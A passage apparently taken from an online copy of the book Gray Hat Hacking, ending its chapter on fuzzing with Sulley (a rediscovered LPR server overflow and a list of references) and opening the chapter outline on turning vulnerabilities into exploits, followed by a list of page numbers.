The As overwrote eip
somewhere due to a classic buffer overflow. At this point, we have enough information to
produce a vulnerability notice to the vendor??¦oh wait, it has already been done!
Way Ahead
As you have seen, we have rediscovered the NIPRINT3 buffer overflow used in Chapter
11.However, there may be more bugs in that server or any other LPR server.We will leave
it to you to use the tools and techniques discussed in this chapter to explore further.
Gray Hat Hacking: The Ethical Hacker??™s Handbook
456
Figure 17-2 Wireshark showing the packet that crashed the LPR server
References
www.grayhathackingbook.com
Dave Aitel, Block Based Fuzzing www.immunitysec.com/downloads/advantages_of_block_
based_analysis.pdf
Sulley Framework www.fuzzing.org
Pedram Amini, Paimei paimei.openrce.org
Sutton, Greene, Amini, Fuzzing: Brute Force Vulnerability Discovery (Addison-Wesley Professional,
2007)
Chapter 17: Intelligent Fuzzing with Sulley
457
PART IV
This page intentionally left blank
459
CHAPTER18 From Vulnerability
to Exploit
??? Determining whether a bug is exploitable
??? Using a debugger efficiently
??? Understanding the exact nature of the problem
??? Preconditions and postconditions for exploitation
??? Repeating the problem reliably
??? Payload construction considerations
??? How to properly document the nature of a vulnerability
Whether you use static analysis, dynamic analysis, or some combination of both to discover
a problem with a piece of software, locating a potential problem or causing a program
to melt down in the face of a fuzzer onslaught is just the first step.
Pages:
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802